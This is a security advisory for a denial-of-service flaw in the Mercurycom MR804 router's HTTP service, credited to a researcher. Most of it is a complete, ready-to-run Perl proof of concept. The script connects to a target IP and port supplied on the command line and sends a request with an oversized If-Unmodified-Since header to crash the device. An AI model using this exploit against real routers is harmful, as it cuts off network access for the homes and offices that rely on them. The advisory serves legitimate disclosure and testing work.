Title: Mercurycom MR804 Router - Multiple HTTP Header Fields Denial Of Service Vulnerability Product : Mercurycom MR804 Router Hardware Version : MR804 v8.0 081C3113 Software Version : 3.8.1 Build 101220 Rel.53006nB Vendor: http://www.mercurycom.com.cn/ Class: Boundary Condition Error CVE: Remote: Yes Local: No Published: 2012-02-21 Updated: Impact : Medium (CVSS2 Base : 6.1, AV:A/AC:L/Au:N/C:N/I:N/A:C) Bug Description : Mercurycom router are commonly used for internet connectivity for home or small office needs. (http://www.mercurycom.com.cn/Product/list) Mercurycom MR804 Router contains any denial of service vulnerability about HTTP Header Fields(Such as If-Modified-Since, If-None-Match, If-Unmodified-Since, etc...) in its HTTP service. POC: #------------------------------------------------------------- #!/usr/bin/perl -w use Socket; $|=1; print '*********************************'."\n"; print '* mercurycom MR804 v8.0 DoS PoC *'."\n"; print '* writed by demonalex@163.com *'."\n"; print '*********************************'."\n"; $evil='A'x4097; $test_ip=shift; #target ip $test_port=shift; #target port if(!defined($test_ip) || !defined($test_port)){ die "usage : $0 target_ip target_port\n"; } $test_payload= "GET / HTTP/1.0\r\n". "Accept: */*\r\n". "Accept-Language: zh-cn\r\n". "UA-CPU: x86\r\n". "If-Unmodified-Since: ".$evil."\r\n". "Accept-Encoding: gzip, deflate\r\n". "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322;". " .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; 360SE)\r\n". "Host: ".$test_ip."\r\n". "Connection: Keep-Alive"."\r\n\r\n"; $test_target=inet_aton($test_ip); $test_target=sockaddr_in($test_port, $test_target); socket(SOCK, AF_INET, SOCK_STREAM, 6) || die "cannot create socket!\n"; connect(SOCK, $test_target) || die "cannot connect the target!\n"; send(SOCK, $test_payload, 0) || die "cannot send the payload!\n"; #recv(SOCK, $test_payload, 100, 0); close(SOCK); print "done!\n"; exit(1); #------------------------------------------------------------- Credits : This vulnerability was discovered by demonalex@163.com mail: demonalex@163.com / ChaoYi.Huang@connect.polyu.hk Pentester/Researcher Dark2S Security Team/PolyU.HK